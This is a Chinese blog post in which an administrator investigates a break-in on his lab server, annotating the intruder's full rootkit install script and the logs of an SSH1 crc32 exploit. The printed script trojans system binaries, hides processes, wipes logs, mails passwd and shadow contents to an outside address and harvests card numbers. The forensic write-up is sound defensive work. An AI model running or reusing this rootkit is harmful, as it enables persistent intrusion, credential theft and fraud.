全部博文(13)
分类: 网络与安全
2005-08-06 23:35:12
本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到
message
那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务
器上检查。唉,果然。。。
[root@mail a]# la- la
bash: la-: command not found
[root@mail a]# ls -la
total 704
drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
-rw------- 1 root root 241664 Jan 28 23:01 core
就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP
就懒得升级,结果。。。等下再gdm你好了。
drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
-rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
真要命,直接放,搞不懂是高手失误还是只会用别人的程序。
drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
就是这个rootkit!看来很多人用这个呢
drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
看到这2个目录没有,已经给改动过了,不可信任。
drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
[root@mail a]# date
星期二 02 5 18:28:17 CST 2002
[root@mail rk]# cat install
#!/bin/sh
unset HISTFILE
STARTDIR=`pwd`
CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
这个程序的作者真不是人,连别人的信用卡都偷!
SMP=`uname -a | grep smp | wc -l`
还真的没考虑过入侵需要考虑是否SMP呢
clear
echo "***** devhda1`s aka Mithra`s rootkit *****"
echo "* greetz 2 bogonel and Amorph|s *"
echo "* This is the RedHat 7.0 build *"
echo "********************************************"
sleep 2
clear
echo "Please wait while Setup is preparing your directory ... "
sleep 5
clear
echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
sleep 2
clear
DIR="/usr/lib/locale/ro_RO/uboot"
mkdir -p $DIR
mkdir -p $DIR/etc
cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。
cd $DIR
echo "Installing trojaned system files ..."
echo "[*] Process tools ..."
替换查看进程命令,FT
echo " |---ps"
chattr -aiu /bin/ps
./sz /bin/ps ps
mv -f ps /bin/ps
chattr +aiu /bin/ps
echo " | \"
echo " | |-- done replacing ps "
sleep 1
echo " |---pstree"
chattr -aiu /usr/bin/pstree
./sz /usr/bin/pstree pstree
mv -f pstree /usr/bin/pstree
chattr +aiu /usr/bin/pstree
echo " | \"
echo " | |-- done replacing pstree "
sleep 1
echo " |---top"
chattr -aiu /usr/bin/top
./sz /usr/bin/top top
mv -f top /usr/bin/top
chattr +aiu /usr/bin/top
echo " | \"
echo " | |-- done replacing top "
echo " |----|"
sleep 5
echo "[*] Network tools ..."
替换网络命令,FT,毒
echo " |---netstat"
chattr -aiu /bin/netstat
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
chattr +aiu /bin/netstat
echo " | \"
echo " | |-- done replacing netstat "
sleep 1
echo " |---ifconfig"
chattr -aiu /sbin/ifconfig
./sz /sbin/ifconfig ifconfig
mv -f ifconfig /sbin/ifconfig
chattr +aiu /sbin/ifconfig
echo " | \"
echo " | |-- done replacing ifconfig "
#echo " |---inetd"
贱啊,什么都换了
#chattr -aiu /usr/sbin/inetd
#./sz /usr/sbin/inetd inetd
#mv -f inetd /usr/sbin/inetd
#chattr +aiu /usr/sbin/inetd
#echo " | \"
#echo " | |-- done replacing inetd "
sleep 1
echo " |---tcpd"
chattr -aiu /usr/sbin/tcpd
./sz /usr/sbin/tcpd tcpd
mv -f tcpd /usr/sbin/tcpd
chattr +aiu /usr/sbin/tcpd
echo " | \"
echo " | |-- done replacing tcpd "
echo " |----|"
sleep 1
echo "[*] Filesystem tools ..."
换了查找命令
echo " |---find"
chattr -aiu /usr/bin/find
./sz /usr/bin/find find
mv -f find /usr/bin/find
chattr +aiu /usr/bin/find
echo " | \"
echo " | |-- done replacing find "
sleep 1
echo " |---ls"
chattr -aiu /bin/ls
./sz /bin/ls ls
mv -f ls /bin/ls
chattr +aiu /bin/ls
echo " | \"
echo " | |-- done replacing ls "
echo " |----|"
echo " |---dir"
chattr -aiu /usr/bin/dir
./sz /usr/bin/dir dir
mv -f dir /usr/bin/dir
chattr +aiu /usr/bin/dir
echo " | \"
echo " | |-- done replacing dir "
echo " |----|"
sleep 1
echo "[*] System tools ..."
echo " |---syslogd"
chattr -aiu /sbin/syslogd
./sz /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chattr +aiu /sbin/syslogd
echo " | \"
echo " | |-- done replacing syslog "
echo " |----|"
删除所有log文件,不过这里写得不好。
用不删除,清内容更好。
rm -f /var/log/messages
touch /var/log/messages
/etc/rc.d/init.d/syslog restart
sleep 1
echo "[*] Placing configuration files in $DIR/etc/ ..."
mv -f netstatrc $DIR/etc/netstatrc
mv -f procrc $DIR/etc/procrc
mv -f filerc $DIR/etc/filerc
mv -f logrc $DIR/etc/logrc
sleep 1
开始编译外挂进程了,还好,不是LKM
echo "[*] Trying to install ADORE ..."
if [ -x /usr/bin/gcc ];
then
echo "GCC is present"
if [ -d /usr/src/linux ];
then
if [ $SMP -eq 0 ];
then
echo "We have a machine without SMP support"
cp -f Makefile.non-smp Makefile
else
echo "This machine supports SMP"
cp -f Makefile.smp Makefile
fi
make
mv -f ava /usr/bin/weather
还改头换面呢,呵呵~~
rm -f *.c *.h Makefile*
echo "ADORE is now installed ..."
else
echo "Kernel sources are not installed. Cannot install ADORE !"
fi
else
echo "GCC is not installed. Cannot install ADORE !"
fi
echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
mv -f network /etc/rc.d/init.d/network
sleep 5
mv -f twist2open /usr/bin/
echo "[*] Starting services ..."
#echo " |---backdoor ..."
#echo " |---sniffer ..."
加了后门还开SNIFFER,哼哼
#echo " |---bnc ..."
/usr/bin/twist2open &
echo " | \"
echo " | |-- done"
echo " |----|"
rm -f ./*pid* /*pid* /*log*
sleep 5
echo "[*] Gathering system info ..."
echo " |---uname -a"
uname -a >>file
echo " |---ifconfig"
/sbin/ifconfig >>file
echo "|------" >>file
echo " |---passwd file"
cat /etc/passwd >>file
echo " |---shadow file"
echo "|------" >>file
cat /etc/shadow >>file
哇!!!!我的密码啊!!!!!!!
echo " |---ping statistics"
ping -c 5 216.115.108.245 >>file
echo " | \"
echo " | |-- done"
echo "[*] Fixing vulns ..."
echo " |---.bash_history"
chattr +ia /root/.bash_history
聪明!的确要佩服这个作者了
echo " |---ftpd"
chmod -s /var/ftp/*
echo " |---rpc"
chmod -s /usr/bin/rpc*
chmod -s /usr/sbin/rpc*
chmod -s /sbin/rpc*
echo " |---named"
chmod -s /var/named
所有应用程序都加上了SUID,幸亏我从来不用默认的服务的
sleep 5
echo " | \"
echo " | |-- done"
echo " |----|"
echo "[*] Cleaning logs. This will take a while ..."
开始清除LOG,进行收尾工作。
./logcleaner ftp >>/dev/null
./logcleaner rpc >>/dev/null
./logcleaner named >>/dev/null
./logcleaner yahoo >>/dev/null
./logcleaner bind >>/dev/null
./logcleaner geocities >>/dev/null
./logcleaner hypermart >>/dev/null
./logcleaner syslogd >>/dev/null
sleep 1
echo " | \"
echo " | |-- done"
echo " |----|"
echo "[*] Mailing system information ..."
mail -s "`uname -a`" ja_ja_j@yahoo.com
rm -f file
cd $STARTDIR
rm -rf ../*rh*
echo "[*] Looking for cards ..."
touch $CARDLOG
egrep -ir 'mastercard|visa' /home|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /var|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /root|egrep -v cache >>$CARDLOG
if [ -d /www ];
then
egrep -ir 'mastercard|visa' /www|egrep -v cache >>$CARDLOG
fi
这些代码就很有问题了,我在怀疑作者的人格了。
echo "Rootkit successfully installed. Enjoy !"
继续分析
[root@mail log]# cat secure
Jan 28 23:28:17 dnscache in.ftpd[2767]: connect from 192.168.100.26
Jan 28 23:28:17 dnscache in.ftpd[2767]: error: cannot execute
/usr/sbin/in.ftpd: No such file or directory
Jan 30 04:44:05 dnscache in.telnetd[3891]: connect from 192.168.100.
141
Jan 30 17:41:17 dnscache in.telnetd[4199]: connect from 211.155.24.246
Jan 31 00:52:23 dnscache login: FAILED LOGIN 1 FROM (null) FOR , User
not known to the underlying authentication module
Jan 31 19:13:57 dnscache in.telnetd[872]: connect from 192.168.100.141
Feb 1 04:03:46 dnscache in.telnetd[1143]: connect from 192.168.100.25
Feb 1 04:12:23 dnscache in.telnetd[1166]: connect from 192.168.100.25
Feb 1 07:34:10 dnscache in.telnetd[1282]: connect from 211.155.24.246
Feb 2 07:05:13 dnscache in.telnetd[1927]: connect from 218.17.238.238
Feb 2 07:16:47 dnscache in.telnetd[1928]: connect from 218.17.238.238
~~~~~~~~~~~~~~~~~~~~~~~~~~~~问题来了,那是ADSL用户,而我是在内网
,怎么可能进来的?FT,要检讨内部安全问题了。
看一下wtmp先:恩。。。正常
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
211.155.24.246
pts/0
runlevel
tty1
<#.
tty2
tty3
tty5
tty1
X.<
tty1
chair
f.<
reboot
runlevel
tty1
LOGIN
看看FTP的记录先,最讨厌FTP进来的人,只有自己。。。删了记录?
root@mail log]# cat xferlog
Fri Nov 23 21:17:31 2001 0 192.168.100.80 36975
/home/chair/daemontools-0.76.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:32 2001 0 192.168.100.80 53019
/home/chair/ucspi-tcp-0.88.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:34 2001 0 192.168.100.80 85648 /home/chair/djbdns-1.
05.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:35 2001 0 192.168.100.80 28416
/home/chair/qmailanalog-0.70.tar.gz b _ i r chair ftp 0 *
[root@mail ssh-scan]#pwd
/mnt/c/var/tmp/ssh-scan
[root@mail ssh-scan]# ls -la
total 32
drwxr-xr-x 8 operator root 4096 Dec 2 08:22 .
drwxrwxrwt 3 root root 4096 Feb 2 08:23 ..
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 bind
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 ftpd
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 lpd
drwxr-xr-x 2 operator root 4096 Jun 16 2001 rpc
drwxr-xr-x 2 operator root 4096 Jun 14 2001 src
drwxr-xr-x 4 operator root 4096 Jan 21 19:57 ssh
奇怪,应该是SCAN这些东西时候留下的文件锁,看来线索
还是不少,或者这个进来的家伙太粗心了。
[root@mail mail]# pwd
/mnt/c/spool/mail
[root@mail mail]#cat root |more
太多了,垃圾日志省去大部分
From root Sun Dec 2 05:01:00 2001
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id FAA23746
for root; Sun, 2 Dec 2001 05:01:00 +0800
Date: Sun, 2 Dec 2001 05:01:00 +0800
From: root
Message-Id: <200112012101.FAA23746@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 12/02/01:05.01 system check
Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
*************** 问题大大的明显!!FT,我的错。
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 2 04:02:00 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!
*************** This could indicate tampering.
***************
*** WARNING ***: Log file /var/log/maillog is smaller than last time
checked!
*************** This could indicate tampering.
From root Sun Dec 9 04:02:01 2001
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA11188
for root; Sun, 9 Dec 2001 04:02:01 +0800
Date: Sun, 9 Dec 2001 04:02:01 +0800
From: root
Message-Id: <200112082002.EAA11188@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: errors rotating logs
errors occured while rotating /var/log/httpd/access_log
httpd: no process killed
error running postrotate script
Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
***************
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!
From root Wed Jan 16 04:01:01 2002
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA16976
for root; Wed, 16 Jan 2002 04:01:01 +0800
Date: Wed, 16 Jan 2002 04:01:01 +0800
From: root
Message-Id: <200201152001.EAA16976@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/16/02:04.01 system check
Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 16 03:41:35 dnscache sshd[16485]: log: Connection from 200.184.184.
51 port 3997
Jan 16 03:41:36 dnscache sshd[16485]: fatal: Did not receive ident
string. 扫描吧,哈哈~~
From root Mon Jan 21 18:01:01 2002
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id SAA19794
for root; Mon, 21 Jan 2002 18:01:01 +0800
Date: Mon, 21 Jan 2002 18:01:01 +0800
From: root
Message-Id: <200201211001.SAA19794@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:18.01 ACTIVE SYSTEM ATTACK!
HOHO~~~~原来是SSH的问题,我的SSH是那个什么破STARLINUX自带的,
1.X吧,因为是实验机器,懒得升级,FT。问题来了
Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Security Violations
=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:50 dnscache sshd[18290]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:53 dnscache sshd[18293]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:57 dnscache sshd[18294]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:00 dnscache sshd[18297]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:35:47 dnscache sshd[18052]: log: Connection from 141.108.9.
13 port 4639
Jan 21 17:35:47 dnscache sshd[18053]: log: Connection from 141.108.9.
13 port 4648
Jan 21 17:35:49 dnscache sshd[18053]: fatal: Local: Your ssh version
is too old and is no longer supported. Pl
ease install a newer version.
原来是这个家伙!但IP很古怪,是不是肉鸡??
Jan 21 17:35:49 dnscache sshd[18056]: log: Connection from 141.108.9.
13 port 4651
Jan 21 17:36:36 dnscache sshd[18075]: log: Connection from 141.108.9.
13 port 4674
Jan 21 17:36:39 dnscache sshd[18078]: log: Connection from 141.108.9.
13 port 4676
Jan 21 17:36:42 dnscache sshd[18078]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:43 dnscache sshd[18079]: log: Connection from 141.108.9.
13 port 4679
Jan 21 17:36:46 dnscache sshd[18082]: log: Connection from 141.108.9.
13 port 4682
Jan 21 17:36:49 dnscache sshd[18082]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:50 dnscache sshd[18085]: log: Connection from 141.108.9.
13 port 4685
Jan 21 17:36:53 dnscache sshd[18085]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:53 dnscache sshd[18088]: log: Connection from 141.108.9.
13 port 4687
Jan 21 17:36:57 dnscache sshd[18089]: log: Connection from 141.108.9.
13 port 4690
Jan 21 17:37:00 dnscache sshd[18089]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:00 dnscache sshd[18092]: log: Connection from 141.108.9.
13 port 4692
Jan 21 17:37:04 dnscache sshd[18095]: log: Connection from 141.108.9.
13 port 4694
Jan 21 17:37:07 dnscache sshd[18095]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:08 dnscache sshd[18096]: log: Connection from 141.108.9.
13 port 4697
Jan 21 17:37:12 dnscache sshd[18099]: log: Connection from 141.108.9.
13 port 4699
Jan 21 17:37:24 dnscache sshd[18099]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:25 dnscache sshd[18106]: log: Connection from 141.108.9.
13 port 4705
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:31 dnscache sshd[18109]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:32 dnscache sshd[18110]: log: Connection from 141.108.9.
13 port 4712
Jan 21 17:37:36 dnscache sshd[18113]: log: Connection from 141.108.9.
13 port 4713
Jan 21 17:37:40 dnscache sshd[18116]: log: Connection from 141.108.9.
13 port 4715
Jan 21 17:37:43 dnscache sshd[18116]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:43 dnscache sshd[18119]: log: Connection from 141.108.9.
13 port 4719
Jan 21 17:37:47 dnscache sshd[18120]: log: Connection from 141.108.9.
13 port 4720
Jan 21 17:37:51 dnscache sshd[18123]: log: Connection from 141.108.9.
13 port 1265Jan 21 17:41:12 dnscache sshd[18236]: log: Connection from
141.108.9.13 port 2326
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:19 dnscache sshd[18241]: log: Connection from 141.108.9.
13 port 2762
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:26 dnscache sshd[18244]: log: Connection from 141.108.9.
13 port 4015
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18247]: log: Connection from 141.108.9.
13 port 4017
Jan 21 17:41:40 dnscache sshd[18252]: log: Connection from 141.108.9.
13 port 4019
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18257]: log: Connection from 141.108.9.
13 port 1049
Jan 21 17:41:59 dnscache sshd[18262]: log: Connection from 141.108.9.
13 port 1051
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:07 dnscache sshd[18265]: log: Connection from 141.108.9.
13 port 1945
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:14 dnscache sshd[18270]: log: Connection from 141.108.9.
13 port 3191
Jan 21 17:42:23 dnscache sshd[18273]: log: Connection from 141.108.9.
13 port 4027
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18276]: log: Connection from 141.108.9.
13 port 1110
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:30 dnscache sshd[18279]: log: Connection from 141.108.9.
13 port 1557
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:33 dnscache sshd[18280]: log: Connection from 141.108.9.
13 port 2124
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18283]: log: Connection from 141.108.9.
13 port 2630
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:40 dnscache sshd[18286]: log: Connection from 141.108.9.
13 port 3184
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18287]: log: Connection from 141.108.9.
13 port 3915
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:47 dnscache sshd[18290]: log: Connection from 141.108.9.
13 port 3918
an 21 17:43:01 dnscache sshd[18300]: log: Connection from 141.108.9.13
port 1033
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:04 dnscache sshd[18303]: log: Connection from 141.108.9.
13 port 1034
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:08 dnscache sshd[18304]: log: Connection from 141.108.9.
13 port 1036
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:11 dnscache sshd[18307]: log: Connection from 141.108.9.
13 port 1586
Jan 21 17:43:14 dnscache sshd[18307]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:43:15 dnscache sshd[18310]: log: Connection from 141.108.9.
13 port 2150
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18311]: log: Connection from 141.108.9.
13 port 2665
Jan 21 17:43:22 dnscache sshd[18314]: log: Connection from 141.108.9.
13 port 3162
Jan 21 17:43:30 dnscache sshd[18319]: log: Connection from 141.108.9.
13 port 4975
Jan 21 17:43:34 dnscache sshd[18320]: log: Connection from 141.108.9.
13 port 1512
从开始连接到溢出只是用了10来分钟,看来SSH1.X不能用了。
Jan 21 17:45:48 dnscache sshd[18052]: fatal: Timeout before
authentication.
Jan 21 17:47:37 dnscache adduser[18423]: new user: name=cgi, uid=0,
gid=0, home=/home/cgi, shell=/bin/bash
加帐号了,5~~~~~
Jan 21 17:47:52 dnscache PAM_pwdb[18426]: password for (cgi/0) changed
by ((null)/0)
Jan 21 17:48:00 dnscache PAM_pwdb[18433]: password for (operator/11)
changed by ((null)/0)
干吗改自己的密码呢?有问题。
Jan 21 17:48:18 dnscache sshd[18442]: log: Connection from 80.96.178.195
port 1465
Jan 21 17:48:20 dnscache sshd[18442]: log: Could not reverse map address
80.96.178.195.
Jan 21 17:48:28 dnscache sshd[18442]: log: Password authentication for
operator accepted.
Jan 21 17:49:12 dnscache sshd[18484]: log: Connection from 80.96.178.194
port 2274
Jan 21 17:49:12 dnscache sshd[18484]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:49:20 dnscache sshd[18484]: log: Password authentication for
operator accepted.
情况很明显了,用了多个IP干活,能确定是肉鸡了,FT。
Jan 21 17:50:30 dnscache sshd[18484]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 17:51:08 dnscache sshd[18555]: log: Connection from 80.96.178.194
port 2281
Jan 21 17:51:08 dnscache sshd[18555]: log: Could not reverse map address
80.96.178.194.
Jan 21 17:51:19 dnscache sshd[18555]: log: Password authentication for
operator accepted.
Jan 21 17:58:11 dnscache sshd[18442]: fatal: Read error from remote
host: Connection reset by peer
by dnscache.i-168.com (8.9.3/8.9.3) id TAA23666
for root; Mon, 21 Jan 2002 19:01:01 +0800
Date: Mon, 21 Jan 2002 19:01:01 +0800
From: root
Message-Id: <200201211101.TAA23666@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:19.01 system check
Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 18:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
Jan 21 18:17:41 dnscache sshd[270]: log: RSA key generation complete.
Jan 21 19:00:16 dnscache sshd[23334]: log: Connection from 80.96.178.195
port 1519
Jan 21 19:00:16 dnscache sshd[23334]: log: Could not reverse map address
80.96.178.195.
Jan 21 19:00:25 dnscache sshd[23334]: log: Password authentication for
operator accepted.
From root Mon Jan 21 20:01:02 2002
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id UAA29460
for root; Mon, 21 Jan 2002 20:01:01 +0800
Date: Mon, 21 Jan 2002 20:01:01 +0800
From: root
Message-Id: <200201211201.UAA29460@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:20.01 system check
Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 21 19:01:54 dnscache sshd[23334]: fatal: Read error from remote
host: Connection reset by peer
Jan 21 19:13:33 dnscache sshd[23975]: log: Connection from 80.96.178.194
port 2406
Jan 21 19:13:33 dnscache sshd[23975]: log: Could not reverse map address
80.96.178.194.
Jan 21 19:13:44 dnscache sshd[23975]: log: Password authentication for
operator accepted.
Jan 21 19:17:41 dnscache sshd[270]: log: Generating new 768 bit RSA
key.
有新机器进来呢,FT,不是好兆头
重启
From root Mon Jan 21 23:01:00 2002
Return-Path:
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id XAA00309
for root; Mon, 21 Jan 2002 23:01:00 +0800
Date: Mon, 21 Jan 2002 23:01:00 +0800
From: root
Message-Id: <200201211501.XAA00309@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:23.01 system check
Feb 2 07:28:18 dnscache sshd[1991]: log: Connection from 24.112.92.
135 port 3854
Feb 2 07:28:21 dnscache sshd[1992]: log: Connection from 24.112.92.
135 port 3855
Feb 2 07:28:30 dnscache sshd[1992]: fatal: Local: crc32 compensation
attack: network attack detected
Feb 2 07:28:31 dnscache sshd[1993]: log: Connection from 24.112.92.
135 port 3856
Feb 2 07:28:34 dnscache sshd[1993]: fatal: Local: crc32 compensation
attack: network attack detected
